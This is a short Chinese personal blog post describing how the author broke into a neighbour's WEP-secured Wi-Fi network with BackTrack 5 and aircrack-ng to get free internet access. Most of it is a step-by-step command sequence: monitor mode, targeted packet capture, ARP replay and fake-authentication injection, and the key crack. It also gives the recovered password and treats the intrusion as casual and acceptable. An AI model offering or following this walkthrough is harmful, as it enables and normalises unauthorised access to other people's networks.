2013年8月14日星期三

BT5 破解无线密码小记

算不上教程一类的文章吧,只是记录一下过程,方便下次自己翻翻
最近刚搬家,没来得及办宽带,可是又不能不上网,没办法,只能委屈下某个开无线的邻居了
我的是台式机,没有无线网卡,不过没关系,我当时在学校宿舍时为了研究无线买过一个USB的无线网卡,所以现在正好派上用场。
打开BT5R2的虚拟机,然后把usb网卡连接到虚拟机里面,但是这里出了个问题,虚拟机一直提示driver error! 试了很多遍都不行,然后想想以前在笔记本上用这个无线网卡的时候也是这么直接连上去的啊,而且也没有再另外装过驱动。想来想去不对劲,然后看着driver error想到驱动有问题,突然发现我把usb无线网卡插在usb3.0延长线的口上,会不会是这个问题:虚拟机里面不支持主板的usb3.0口!?于是将网卡拔下插到主板前面板2.0的口上,连接成功,搞定!
首先需要将网卡设置为监听模式并开启监听状态,打开一个终端窗口,输入:
点击(此处)折叠或打开
  1. airmon-ng start wlan0
  2. airodump-ng mon0

TP_LINK那个目标不错,而且也有人在上网,这样数据量会比较大,抓包比较快,最重要的是是WEP的,这样就不用跑字典了

CH显示是6,所以输入命令:
点击(此处)折叠或打开
  1. airodump-ng --ivs -w wocao -c 6 mon0
  2.     -c 这里我们设置目标AP的工作频道
        -w 后跟要保存的文件名
将抓的包保存为wocao文件,这个文件会自动在后面加个序号,第一次是01,第二次02以此类推,后缀是ivs
为了加速攻击过程,我们发送虚假构造的包,输入:
点击(此处)折叠或打开
  1. aireplay-ng -3 -b 00:19:E0:C8:45:8C -h 00:1C:BF:1A:1B:66 mon0
  2. 注:aireplay-ng -3 -b AP的mac -h 客户端的mac mon0 
 得到大量的反馈报文

这时候输入命令进行破解:
点击(此处)折叠或打开
  1. aircrack-ng wocao-01.ivs
  2. 注:后面是跟着之前设定的保存报文的文件名,注意01编号和ivs后缀
开始破解,说ivs不够,等5000,然后15000,然后20000,在19000多时破解成功

然后连接TP_LINK,输入密码为0054148087,注意不要中间的冒号,连接成功,开始上网咯。

我其实在昨天晚上就发现了这个无线点,当时晚上12点多了,那时候没有人连接上网,我发送的伪造连接的数据包获取ivs值太慢,挂了20分钟才2000多点,然后想算了,等明天晚上八九点应该会有人上网,到时候再弄,果然今天等了一会就发现有人上网了。

破解时需要有人连接上网,下面给出没有人连接时的两条命令,自己构造连接和伪造包攻击路由器
点击(此处)折叠或打开
  1. aireplay-ng -1 0 -a AP's MAC -h MyMAC mon0
  2. aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h MyMAC mon0
  3. 再运行
  4. aireplay-ng -3 -b AP的mac -h 客户端的mac mon0
  5. aircrack-ng 捕获的ivs文件

没有评论:

发表评论